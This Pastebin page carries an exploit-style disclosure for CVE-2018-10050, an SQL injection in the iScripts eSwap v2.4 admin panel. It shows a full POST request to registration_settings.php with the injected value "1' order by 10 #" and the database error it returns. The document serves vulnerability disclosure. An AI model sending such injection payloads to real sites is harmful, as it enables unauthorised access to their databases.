daily pastebin goal
68%
SHARE
TWEET

CVE-2018-10050

ManhNho Apr 11th, 2018 (edited) 205 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit title: iScripts eSwap v2.4 - SQL injection via the registration_settings.php Admin Panel
  2. # Date: 11/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/eswap
  6. # Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
  7. # Version: 2.4
  8. # CVE: CVE-2018-10050
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts eSwap v2.4 has SQL injection via the "registration_settings.php" function parameter in Admin Panel.
  16.  
  17.  
  18. #2. Proof of Concept
  19. -----------------------------------------------------
  20.  
  21. Request:
  22.  
  23. POST /eswap/demo//admin/registration_settings.php?act=post HTTP/1.1
  24. Host: www.demo.iscripts.com
  25. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  26. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  27. Accept-Language: en-GB,en;q=0.5
  28. Accept-Encoding: gzip, deflate
  29. Referer: https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php
  30. Content-Type: application/x-www-form-urlencoded
  31. Content-Length: 34
  32. Cookie: __utma=227100805.298811387.1522637403.1523431492.1523438388.8; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; __utma=129714457.1603653646.1523416273.1523416273.1523433224.2; __utmz=129714457.1523433224.2.2.utmcsr=iscripts.com|utmccn=(referral)|utmcmd=referral|utmcct=/supportdesk/demo.php; PHPSESSID=i3nkqgvua59eplfm18urecqdb1; __utmb=227100805; __utmc=227100805; hs-messages-is-open=false
  33. Connection: close
  34. Upgrade-Insecure-Requests: 1
  35.  
  36. ddlFree= 1' order by 10 # &txtDate=1
  37.  
  38. Response:
  39.  
  40. HTTP/1.1 200 OK
  41. Date: Wed, 11 Apr 2018 10:06:11 GMT
  42. Server: Apache
  43. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  44. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  45. Pragma: no-cache
  46. Connection: close
  47. Content-Type: text/html
  48. Content-Length: 2645
  49. ...
  50. <div class="clear"></div>
  51. </div>
  52. </div>
  53. Unknown column '10' in 'order clause'
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top